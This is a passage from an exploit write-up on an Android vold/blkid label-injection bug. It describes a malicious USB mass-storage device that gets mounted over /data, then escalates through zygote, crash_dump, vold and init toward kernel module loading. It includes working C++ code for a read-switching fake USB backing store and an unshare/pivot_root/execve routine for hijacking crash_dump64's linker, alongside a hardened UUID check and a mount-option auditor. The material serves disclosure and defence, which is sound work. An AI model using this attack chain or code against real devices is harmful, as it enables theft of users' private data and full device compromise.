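    size_t pos = line.find(key);
    if (pos == std::string::npos) return "";
    pos += std::strlen(key);
    size_t end = line.find('"', pos);
    if (end == std::string::npos) return "";
    return line.substr(pos, end - pos);
}

// The line blkid_untrusted prints for a vfat partition. The old blkid did not
// escape the label, so a label containing UUID=" lands in the output verbatim.
std::string formatBlkidLine(const std::string& label, const std::string& uuid) {
    return "/dev/block/sda1: LABEL=\"" + label + "\" UUID=\"" + uuid + "\" TYPE=\"vfat\"";
}

// Vulnerable consumer: the first UUID=" and TYPE=" anywhere in the line win.
BlkidResult parseBlkidLine(const std::string& line) {
    return {valueAfter(line, "LABEL=\""), valueAfter(line, "UUID=\""),
            valueAfter(line, "TYPE=\"")};
}

// Vulnerable path construction, mirroring StringPrintf("/mnt/media_rw/%s", ...):
// whatever blkid called the UUID goes straight into the pathname.
std::string buildMountPath(const std::string& uuid, const std::string& volumeId) {
    const std::string& stableName = uuid.empty() ? volumeId : uuid;
    return "/mnt/media_rw/" + stableName;
}

// Lexically resolves "." and ".." so we can see where the kernel would mount.
std::string resolveDots(const std::string& path) {
    std::vector<std::string> parts;
    size_t i = 0;
    while (i <= path.size()) {
        size_t j = path.find('/', i);
        if (j == std::string::npos) j = path.size();
        std::string comp = path.substr(i, j - i);
        if (comp == "..") {
            if (!parts.empty()) parts.pop_back();
        } else if (!comp.empty() && comp != ".") {
            parts.push_back(comp);
        }
        i = j + 1;
    }
    std::string out;
    for (const std::string& p : parts) out += "/" + p;
    return out.empty() ? "/" : out;
}

// Hardened check: blkid reports a vfat volume id as XXXX-XXXX (eight hex digits).
// Anything else (a slash, a dot, a quote, the wrong length) never reaches a pathname.
bool isSaneFatUuid(const std::string& uuid) {
    if (uuid.size() != 9 || uuid[4] != '-') return false;
    for (size_t k = 0; k < uuid.size(); k++) {
        if (k == 4) continue;
        if (!std::isxdigit(static_cast<unsigned char>(uuid[k]))) return false;
    }
    return true;
}

// Hardened path construction: fall back to vold's own volume id unless the UUID
// is sane, and refuse outright if the resolved path still escapes /mnt/media_rw/.
bool buildMountPathSafe(const std::string& uuid, const std::string& volumeId,
                        std::string* out) {
    const std::string& stableName = isSaneFatUuid(uuid) ? uuid : volumeId;
    std::string path = resolveDots("/mnt/media_rw/" + stableName);
    if (path.compare(0, 14, "/mnt/media_rw/") != 0) return false;
    *out = path;
    return true;
}

int main() {
    // Constructed input: the 11-byte label from the post plus a plausible volume id.
    BlkidResult r = parseBlkidLine(formatBlkidLine("UUID=\"../##", "1234-ABCD"));
    std::printf("parsed: label=%s uuid=%s type=%s\n", r.label.c_str(), r.uuid.c_str(), r.type.c_str());
    std::printf("vulnerable: mounts at %s\n", resolveDots(buildMountPath(r.uuid, "public:8,1")).c_str());
    std::string safe;
    if (buildMountPathSafe(r.uuid, "public:8,1", &safe))
        std::printf("hardened: mounts at %s\n", safe.c_str());
    else
        std::printf("hardened: refused\n");
    return 0;
}
```

Run as written, the parse step yields uuid=../## and type=vfat, the vulnerable path resolves to /mnt/##, and the hardened path falls back to /mnt/media_rw/public:8,1. The hardened version keeps vold's own fallback to the volume id; the difference is that a malformed UUID is treated as absent rather than trusted, and the resolved path is checked against the expected prefix as a second line of defence.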
However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:
  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes 'UUID="' to start the injection, which leaves only five characters for the directory traversal - insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mounton permission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won't be permitted to actually interact with the filesystem - for example, the zygote and system_server aren't allowed to do so. On top of that, processes that don't have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section "Dealing with SELinux: Triggering the bug twice" describes how these restrictions can be avoided in the context of this specific bug.
Exploitation: Chameleonic USB mass storage

As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you'd then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn't require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time, blkid also performs some sanity checks on superblocks, the PoC takes a different route.
After blkid has read parts of the filesystem and used them to determine the filesystem's type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.
A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.
This is relatively simple to implement in practice thanks to Linux' built-in support for device-side USB. Andrzej Pietrasiewicz's talk "Make your own USB gadget" is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.
The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn't add unwanted caching.
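To make the re-read behaviour concrete, here is an added example (it is not the Project Zero PoC, which serves the same idea through a FUSE file behind f_mass_storage): an in-memory backing store, ChameleonStore, that answers the first read of sector 0 with a romfs superblock carrying a volume name of arbitrary length, and every later read with an ordinary FAT12 boot sector. The header layouts follow the romfs and FAT specifications, but only the fields a probe inspects are filled in; the class and function names and the sample label strings are constructed for the example.

```cpp
// Added example: an in-memory model of the "chameleonic" backing store. The real
// PoC serves this through a FUSE file behind f_mass_storage; names are hypothetical.
#include <algorithm>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <string>
#include <utility>
#include <vector>

static const size_t kSectorSize = 512;

// Minimal romfs superblock: "-rom1fs-" at 0, full size at 8, checksum at 12 and
// the NUL-terminated volume name from offset 16 (layout per the romfs docs). The
// volume name is not limited to 11 bytes, which is the whole point.
std::vector<uint8_t> makeRomfsHeader(const std::string& volumeName) {
    std::vector<uint8_t> sec(kSectorSize, 0);
    std::memcpy(sec.data(), "-rom1fs-", 8);
    uint32_t size = kSectorSize;                      // big-endian; value irrelevant here
    sec[8] = static_cast<uint8_t>(size >> 24);
    sec[9] = static_cast<uint8_t>(size >> 16);
    sec[10] = static_cast<uint8_t>(size >> 8);
    sec[11] = static_cast<uint8_t>(size);
    size_t n = std::min(volumeName.size(), kSectorSize - 17);  // leave room for the NUL
    std::memcpy(&sec[16], volumeName.data(), n);
    return sec;
}

// Minimal FAT12 boot sector: jump, OEM name, BPB, 11-byte label at 43, 0x55AA at 510.
std::vector<uint8_t> makeFatBootSector(const std::string& label) {
    std::vector<uint8_t> sec(kSectorSize, 0);
    sec[0] = 0xEB; sec[1] = 0x3C; sec[2] = 0x90;        // jmp short / nop
    std::memcpy(&sec[3], "MSWIN4.1", 8);                 // OEM name
    sec[11] = 0x00; sec[12] = 0x02;                       // bytes per sector = 512
    sec[13] = 1;                                          // sectors per cluster
    sec[14] = 1;                                          // reserved sectors
    sec[16] = 2;                                          // number of FATs
    sec[17] = 16;                                         // root directory entries
    sec[19] = 64;                                         // total sectors (16-bit field)
    sec[21] = 0xF8;                                       // media descriptor
    sec[22] = 1;                                          // sectors per FAT
    sec[38] = 0x29;                                       // extended boot signature
    std::string padded = label.substr(0, 11);
    padded.resize(11, ' ');
    std::memcpy(&sec[43], padded.data(), 11);
    std::memcpy(&sec[54], "FAT12   ", 8);
    sec[510] = 0x55; sec[511] = 0xAA;
    return sec;
}

bool looksLikeRomfs(const std::vector<uint8_t>& sec) {
    return sec.size() >= 8 && std::memcmp(sec.data(), "-rom1fs-", 8) == 0;
}
std::string romfsVolumeName(const std::vector<uint8_t>& sec) {
    std::string name;
    for (size_t i = 16; i < sec.size() && sec[i] != 0; i++) name += static_cast<char>(sec[i]);
    return name;
}
bool hasFatSignature(const std::vector<uint8_t>& sec) {
    return sec.size() >= 512 && sec[510] == 0x55 && sec[511] == 0xAA;
}
std::string fatLabel(const std::vector<uint8_t>& sec) {
    if (sec.size() < 54) return "";
    return std::string(reinterpret_cast<const char*>(&sec[43]), 11);
}

// Backing store whose sector 0 changes identity after its first read. Because the
// host drops its page cache for the block device on the last close (__blkdev_put),
// blkid, fsck_msdos and the kernel's vfat code each re-read sector 0 from the device.
class ChameleonStore {
  public:
    ChameleonStore(std::vector<uint8_t> firstSector0, std::vector<uint8_t> laterSector0)
        : first_(std::move(firstSector0)), later_(std::move(laterSector0)) {}

    // What the device returns for a read of `len` bytes at byte `offset`.
    std::vector<uint8_t> read(uint64_t offset, size_t len) {
        std::vector<uint8_t> out(len, 0);            // everything past sector 0 reads as zeros
        if (offset < kSectorSize) {
            const std::vector<uint8_t>& src = (sector0Reads_ == 0) ? first_ : later_;
            size_t n = std::min(len, static_cast<size_t>(kSectorSize - offset));
            std::memcpy(out.data(), src.data() + offset, n);
            sector0Reads_++;
        }
        return out;
    }
    unsigned sector0Reads() const { return sector0Reads_; }

  private:
    std::vector<uint8_t> first_, later_;
    unsigned sector0Reads_ = 0;
};

int main() {
    // Constructed: a romfs identity with a long label for blkid, a plain FAT for everyone after it.
    ChameleonStore dev(makeRomfsHeader("UUID=\"../../data"), makeFatBootSector("HARMLESS"));
    const char* consumers[] = {"blkid", "fsck_msdos", "kernel vfat"};
    for (const char* who : consumers) {
        std::vector<uint8_t> sec = dev.read(0, kSectorSize);
        if (looksLikeRomfs(sec))
            std::printf("%-11s sees romfs, volume name %s\n", who, romfsVolumeName(sec).c_str());
        else if (hasFatSignature(sec))
            std::printf("%-11s sees vfat, label '%s'\n", who, fatLabel(sec).c_str());
    }
    return 0;
}
```

The model only switches on the count of reads touching sector 0; the real PoC has to do the same thing against the actual sequence of SCSI READ commands the phone issues, which is why it also stalls reads to impose ordering.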
At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string 'UUID="../../data'), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.
However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.

Dealing with SELinux: Triggering the bug twice

The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.
vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.
A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at /data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.
As an attacker, it normally shouldn't be possible to mount an ext4 filesystem this way because phones aren't usually set up with any such keys; and even if there is such a key, you'd still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn't entirely correct - actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)
Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.
In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem - including mapping them with PROT_EXEC.

Injecting into zygote

The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.
When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable /system partition; only the art file is actually stored on /data. But we can instead make system@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with __attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.
The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.
When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the "Unlock for all features and data" prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running "ls /sdcard" on the device.
This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.
Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn't immediately fall over - while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.
After some experimentation, it turned out that Android's code for tracking bandwidth usage has a safety check: If the network usage tracking code can't write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.
To create a network connection, there are two options:
  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn't work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you'd probably want to use an ethernet connection.
At this point, we can run arbitrary native code in zygote context and access user data; but we can't yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would've been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we'll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMIN capability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting the NO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:
  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 - which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn't work if the root filesystem is a rootfs filesystem. This is the technique used here.

In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers /system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux label u:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):
https://android.googlesource.com/platform/system/sepolicy/+/master/private/domain.te#1:

    domain_auto_trans(domain, crash_dump_exec, crash_dump);
At the time this bug was reported, the crash_dump domain had the following SELinux policy:
https://android.googlesource.com/platform/system/sepolicy/+/a3b3bdbb2fdbb4c540ef4e6c3ba77f5723ccf46d/public/crash_dump.te:

    [...]
    allow crash_dump {
      domain
      -init
      -crash_dump
      -keystore
      -logd
    }:process { ptrace signal sigchld sigstop sigkill };
    [...]
    r_dir_file(crash_dump, domain)
    [...]
This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take over vold.
Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, and crash_dump can't use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code into crash_dump64, it still wouldn't be able to leverage that to attack system components because of the UID mismatch.
If you've been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn't work because vold - very sensibly - hardcodes the MS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).
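A check a practitioner may want after reading the paragraph above: confirm that removable-media mounts on a device really carry nosuid (and, for good measure, nodev and noexec) by parsing /proc/self/mountinfo. This is an added example, not from the post or from vold; the mountinfo lines are constructed in the format proc(5) documents, and the mount points, device names and the expectation of nosuid,nodev,noexec under /mnt/media_rw/ are assumptions made for the example.

```cpp
// Added example: parse /proc/self/mountinfo and flag mounts under a prefix that
// lack required per-mount options. Not from the post; sample lines are constructed.
#include <cstdio>
#include <string>
#include <vector>

struct MountEntry {
    std::string mountPoint, fsType, source;
    std::vector<std::string> options;   // per-mount options: rw, nosuid, nodev, noexec, ...
};

static std::vector<std::string> split(const std::string& s, char sep) {
    std::vector<std::string> out;
    std::string cur;
    for (char c : s) {
        if (c == sep) { out.push_back(cur); cur.clear(); } else cur += c;
    }
    out.push_back(cur);
    return out;
}

// mountinfo escapes space, tab, newline and backslash in paths as \040, \011, \012, \134.
static std::string unescape(const std::string& s) {
    std::string out;
    for (size_t i = 0; i < s.size(); i++) {
        bool octal = s[i] == '\\' && i + 3 < s.size() &&
                     s[i + 1] >= '0' && s[i + 1] <= '7' &&
                     s[i + 2] >= '0' && s[i + 2] <= '7' &&
                     s[i + 3] >= '0' && s[i + 3] <= '7';
        if (octal) {
            int v = (s[i + 1] - '0') * 64 + (s[i + 2] - '0') * 8 + (s[i + 3] - '0');
            out += static_cast<char>(v);
            i += 3;
        } else {
            out += s[i];
        }
    }
    return out;
}

// One mountinfo line, per proc(5):
//   id parent major:minor root mountpoint options [optional fields...] - fstype source superopts
bool parseMountinfoLine(const std::string& line, MountEntry* out) {
    std::vector<std::string> f = split(line, ' ');
    if (f.size() < 10) return false;
    size_t dash = 6;
    while (dash < f.size() && f[dash] != "-") dash++;     // skip the optional fields
    if (dash + 2 >= f.size()) return false;
    out->mountPoint = unescape(f[4]);
    out->options = split(f[5], ',');
    out->fsType = f[dash + 1];
    out->source = unescape(f[dash + 2]);
    return true;
}

bool hasOption(const MountEntry& m, const std::string& opt) {
    for (const std::string& o : m.options) if (o == opt) return true;
    return false;
}

// Mount points under `prefix` that are missing at least one of `required`, in file order.
std::vector<std::string> findWeakMounts(const std::string& mountinfo, const std::string& prefix,
                                        const std::vector<std::string>& required) {
    std::vector<std::string> weak;
    for (const std::string& line : split(mountinfo, '\n')) {
        MountEntry m;
        if (line.empty() || !parseMountinfoLine(line, &m)) continue;
        if (m.mountPoint.compare(0, prefix.size(), prefix) != 0) continue;
        for (const std::string& r : required) {
            if (!hasOption(m, r)) { weak.push_back(m.mountPoint); break; }
        }
    }
    return weak;
}

// Constructed sample (not captured from a device): one correctly restricted USB mount,
// one mounted with no restrictions at all, one missing only noexec, and /data for contrast.
const char* kSampleMountinfo =
    "33 21 8:1 / /mnt/media_rw/1234-ABCD rw,dirsync,nosuid,nodev,noexec,relatime - vfat /dev/block/sda1 rw,uid=1023,gid=1023\n"
    "34 21 8:17 / /mnt/media_rw/DEAD-BEEF rw,relatime - vfat /dev/block/sdb1 rw\n"
    "35 21 8:33 / /mnt/media_rw/USB\\040STICK rw,nosuid,nodev,relatime - vfat /dev/block/sdc1 rw\n"
    "36 1 253:0 / /data rw,nosuid,nodev,noatime - ext4 /dev/block/dm-0 rw\n";

int main() {
    std::vector<std::string> weak =
        findWeakMounts(kSampleMountinfo, "/mnt/media_rw/", {"nosuid", "nodev", "noexec"});
    for (const std::string& w : weak) std::printf("weak removable mount: %s\n", w.c_str());
    return 0;
}
```

On a real device, read /proc/self/mountinfo into a string and pass it in place of kSampleMountinfo; field 6 is the per-mount option set, which is where MS_NOSUID shows up as nosuid, independent of the superblock options at the end of the line.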
To inject code into crash_dump64, we can create a new mount namespace with unshare() (using our CAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers of crash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.
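As an added example (not the PoC's code) of the two pieces this step relies on, both the pivot_root() option listed earlier and the crash_dump64 trick just described: readInterp() pulls the PT_INTERP path out of an ELF64 image the way the kernel's loader does before it resolves that path against the process root, and execUnderPrivateRoot() performs the unshare()/pivot_root()/execve() sequence on Linux. The ELF parser runs on a constructed in-memory image; the pivot function needs CAP_SYS_ADMIN and only runs when the program is invoked with a directory and a program path, so the example is inert on an ordinary machine. Function names and the sample interpreter path are assumptions made for the example.

```cpp
// Added example (not the PoC's code): the PT_INTERP lookup the kernel performs on
// execve(), plus the unshare()/pivot_root()/execve() sequence that makes the kernel
// resolve that path inside a directory we control. Names are hypothetical.
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <string>
#include <vector>
#ifdef __linux__
#include <sched.h>
#include <sys/mount.h>
#include <sys/syscall.h>
#include <unistd.h>
#endif

// ELF64 field offsets (System V gABI): ELF header, then program header entries.
enum : size_t { E_PHOFF = 0x20, E_PHENTSIZE = 0x36, E_PHNUM = 0x38,
                P_TYPE = 0x00, P_OFFSET = 0x08, P_FILESZ = 0x20 };
static const uint32_t kPtInterp = 3;

template <typename T>
static bool readField(const std::vector<uint8_t>& img, size_t off, T* out) {
    if (off + sizeof(T) > img.size()) return false;
    std::memcpy(out, &img[off], sizeof(T));   // host assumed little-endian, like arm64
    return true;
}

// Interpreter path of a little-endian ELF64 image, or "" if there is none. This is
// the string the kernel opens relative to the process root before running anything.
std::string readInterp(const std::vector<uint8_t>& img) {
    if (img.size() < 64 || std::memcmp(img.data(), "\x7f" "ELF", 4) != 0) return "";
    if (img[4] != 2 || img[5] != 1) return "";              // ELFCLASS64, ELFDATA2LSB
    uint64_t phoff; uint16_t phentsize, phnum;
    if (!readField(img, E_PHOFF, &phoff) || !readField(img, E_PHENTSIZE, &phentsize) ||
        !readField(img, E_PHNUM, &phnum)) return "";
    for (uint16_t i = 0; i < phnum; i++) {
        size_t ph = static_cast<size_t>(phoff) + static_cast<size_t>(i) * phentsize;
        uint32_t type; uint64_t off, filesz;
        if (!readField(img, ph + P_TYPE, &type) || !readField(img, ph + P_OFFSET, &off) ||
            !readField(img, ph + P_FILESZ, &filesz)) return "";
        if (type != kPtInterp) continue;
        if (filesz == 0 || off > img.size() || filesz > img.size() - off) return "";
        std::string s(reinterpret_cast<const char*>(&img[off]), static_cast<size_t>(filesz));
        size_t nul = s.find('\0');
        return nul == std::string::npos ? s : s.substr(0, nul);
    }
    return "";
}

// Constructed test input: a minimal ELF64 image whose only program header is PT_INTERP.
std::vector<uint8_t> makeElfWithInterp(const std::string& interp) {
    std::vector<uint8_t> img(64 + 56, 0);
    std::memcpy(img.data(), "\x7f" "ELF", 4);
    img[4] = 2; img[5] = 1; img[6] = 1;                   // 64-bit, little-endian, version 1
    img[16] = 2; img[18] = 0xB7;                           // ET_EXEC, EM_AARCH64
    uint64_t phoff = 64; uint16_t phentsize = 56, phnum = 1;
    std::memcpy(&img[E_PHOFF], &phoff, sizeof phoff);
    std::memcpy(&img[E_PHENTSIZE], &phentsize, sizeof phentsize);
    std::memcpy(&img[E_PHNUM], &phnum, sizeof phnum);
    uint32_t type = kPtInterp;
    uint64_t off = img.size(), filesz = interp.size() + 1;  // path plus its NUL
    std::memcpy(&img[64 + P_TYPE], &type, sizeof type);
    std::memcpy(&img[64 + P_OFFSET], &off, sizeof off);
    std::memcpy(&img[64 + P_FILESZ], &filesz, sizeof filesz);
    img.insert(img.end(), interp.begin(), interp.end());
    img.push_back(0);
    return img;
}

#ifdef __linux__
// Moves this process's root to `newRoot` in a private mount namespace, then execs
// `prog` (a path relative to the new root). Needs CAP_SYS_ADMIN. The kernel looks up
// prog's PT_INTERP under newRoot, so newRoot/system/bin/linker64 is what runs first.
int execUnderPrivateRoot(const char* newRoot, const char* prog, char* const argv[]) {
    if (unshare(CLONE_NEWNS) != 0) { std::perror("unshare"); return -1; }
    // Keep the following mount changes out of the parent namespace.
    if (mount(nullptr, "/", nullptr, MS_REC | MS_PRIVATE, nullptr) != 0) { std::perror("mount private"); return -1; }
    // pivot_root() requires new_root to be a mount point; bind-mounting it onto itself does that.
    if (mount(newRoot, newRoot, nullptr, MS_BIND | MS_REC, nullptr) != 0) { std::perror("bind"); return -1; }
    if (chdir(newRoot) != 0) { std::perror("chdir"); return -1; }
    // put_old may be the same directory as new_root (see pivot_root(2)); the old root
    // then sits stacked under "." and is detached.
    if (syscall(SYS_pivot_root, ".", ".") != 0) { std::perror("pivot_root"); return -1; }
    if (umount2(".", MNT_DETACH) != 0) { std::perror("umount2"); return -1; }
    if (chdir("/") != 0) { std::perror("chdir /"); return -1; }
    execv(prog, argv);
    std::perror("execv");
    return -1;
}
#endif

int main(int argc, char** argv) {
    std::vector<uint8_t> img = makeElfWithInterp("/system/bin/linker64");
    std::printf("PT_INTERP of constructed image: %s\n", readInterp(img).c_str());
#ifdef __linux__
    // Usage: ./a.out <new-root-dir> <program-path-inside-new-root> [args...]
    if (argc >= 3) return execUnderPrivateRoot(argv[1], argv[2], argv + 2);
#endif
    return 0;
}
```

The second function is the reason the MS_NOSUID defence above does not help here: nothing in the exec is a setuid or domain-transitioning file on the attacker's mount; the target is a legitimate crash_dump64 on /system, and only the interpreter path it names is resolved inside the attacker-controlled root.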
At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android's security policy considers us to have kernel-equivalent privileges; however, to see what you'd have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn't look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:
https://android.googlesource.com/platform/system/sepolicy/+/master/private/kernel.te:

    domain_auto_trans(kernel, init_exec, init)
This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn't mounted with MS_NOSUID, then our file will be executed in init context.
The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called "usermode helpers" that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, ...) to userspace code. In particular, when a nonexistent key is looked up (e.g. via request_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.
Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then call request_key(), and the kernel invokes our request-key in init context.
The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):
    domain_trans(init, { rootfs toolbox_exec }, modprobe)
    domain_trans(init, vendor_toolbox_exec, vendor_modprobe)
modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:
    allow modprobe self:capability sys_module;
    allow modprobe { system_file }:system module_load;
    allow vendor_modprobe self:capability sys_module;
    allow vendor_modprobe { vendor_file }:system module_load;
Android nowadays doesn't require signatures for kernel modules:
Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.

Lessons learned

